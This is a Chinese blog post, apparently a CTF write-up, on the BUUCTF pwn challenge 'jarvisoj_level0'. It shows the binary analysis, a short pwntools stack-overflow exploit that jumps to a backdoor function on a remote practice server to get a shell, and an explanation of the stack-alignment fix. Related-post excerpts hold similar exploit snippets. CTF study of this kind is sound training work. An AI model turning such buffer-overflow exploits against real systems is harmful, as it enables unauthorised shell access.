BUUCTF jarvisoj_level0 1

于 2023-10-14 20:03:04 发布
阅读量379 收藏
点赞数 1
分类专栏: # pwn 文章标签: ctf 网络安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56313338/article/details/133829061
版权

目录

一、分析

查看文件信息
在这里插入图片描述
关键信息

  • 64位程序
  • 栈不可执行

IDA64反汇编
在这里插入图片描述
进入第一个函数
在这里插入图片描述
栈溢出
shift + F12查找字符串
在这里插入图片描述
点进去
在这里插入图片描述
发现是一个后门函数

二、EXP

from pwn import *

context.arch = 'amd64'
# p = process("/tmp/pwn/level0")
p = remote("node4.buuoj.cn",28644)
elf = ELF("/tmp/pwn/level0")
callsystem = elf.symbols['callsystem']
p.sendline(flat([b"a"*128, 'a'*8, callsystem]))

p.interactive()

三、本地打不通?远程能打通?

修改代码处

p.sendline(flat([b"a"*128, 'a'*8, callsystem + 1]))

为什么地址地址 + 1就可以执行了呢?

👉参考该文章

64位ubuntu18以上系统调用system函数时是需要栈对齐的。再具体一点就是64位下system函数有个movaps指令,这个指令要求内存地址必须16字节对齐

在这里插入图片描述
跳过了push rbp之后,rsp就少压栈了8字节,此时栈16位对齐

bug小空
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jarvis OJ level1
Kni9hT's Blog
11-08 573
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
BUUCTF刷题之路-jarvisoj_level01
最新发布
qq_30528603的博客
05-27 199
看到个read函数,而且能输入的最大字节数为512字节。而buf我们看到是128字节的限度,那应该是存在栈溢出的问题。而且我们直接看到有个后门函数,和前面几题的套路如出一辙。
jarvisoj_level0
zip471642048的博客
01-17 398
jarvisoj_level0 pwn的最简单的题目了,难的我是真不会了,说一下做题思路 首先拿到题目checksec检查一下开了什么东西 64位程序什么都没有开,太好了,开了东西就不会了~~。 ida64位查看shift+F12看一下,看到了、/bin/bash和system,然后就是Hello World 查看main函数 跟进vulnerable_function,很明显在这里发生溢出,buf的大小只有0x80但是缺接收了0x200导致溢出 gdb-peda调试程序,创建150用于溢出的字符串
LRVOSUN.rar_level set_level set model
07-14
A new level set model without initialization, very time effi
level_set_image.rar_level set_level set 方程
09-21
图像处理的偏微分方程方法-王大凯第78页的程序
Level_Set.zip_level set_level-set_set
07-15
Level Set 程序 识别图像 很好用的
DRLSE.rar_distance_drlse_level set_level-set
09-23
matlab code for Distance Regularized Level Set Evolution
BUUCTF jarvisoj_level0
、moddemod
06-11 650
exp from pwn import * context(log_level='debug', arch='amd64') p = remote('node3.buuoj.cn', 26990) proc_name = './level0' # p = process(proc_name) # elf = p.elf elf = ELF(proc_name) bin_sh_str = 0x400684 system_plt = elf.plt['system'] pop_rdi_ret = 0x40.
jarvisoj——[XMAN]level0
王嘟嘟的博客
07-14 341
题目 Wp 拿下来之后发现是一个64位的,直接开ida main函数,现在对main函数已经很熟悉了 这里看到一个方法 这里按照规则覆盖即可。 脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...
攻防世界level0 + (Jarvis Oj)(Pwn) level1
qq_44832048的博客
07-24 1921
攻防世界level0 将文件在ida中打开, 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互,双击进去查看,, 无参数传入,buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。查找字符串 这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址...
jarvisoj-level1
qq_35661990的博客
11-08 261
先看一下有什么保护 什么保护都没开起来。 放进IDA里看一下 vulnerable_function(); write(1, "Hello, World!\n", 0xEu); return 0; main函数里就三行,进入vulnerable_function()函数看一下 char buf; // [esp+0h] [ebp-88h] printf("W...
jarvisoj_level
m0_75234353的博客
05-09 135
这题和前面最大的不同就是x64,就意味着参数调用方式的不同。不再是像32位一样,把参数压入栈中。而是先压入指定寄存器,第七个以后的再按逆序压入栈。
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 334
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 143
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
jarvisoj_level1
m0sway的博客
12-03 2227
jarvisoj_level1 使用checksec查看: 保护全关,并且还有RWX区域。栈溢出的题目的话直接ret2shellcode即可。 放进IDA中查看: 主函数中直接给出漏洞函数: 妥妥的一个栈溢出了,程序会输出buf的地址。 查看了下字符串也没有关键字符串,看来就是ret2shellcode 然而…BUU上的环境可能有点问题。并不能打通。 于是…使用ret2libc的方式。用write泄露libc的地址,然后捣鼓捣鼓。 exp: from pwn import * from six imp

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值